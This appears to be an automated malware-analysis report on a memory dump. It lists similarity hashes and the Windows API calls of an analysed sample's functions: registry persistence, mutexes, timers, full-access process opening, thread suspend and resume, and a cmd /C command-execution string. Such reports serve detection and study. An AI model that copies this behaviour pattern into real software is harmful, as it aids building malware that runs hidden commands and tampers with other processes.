Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
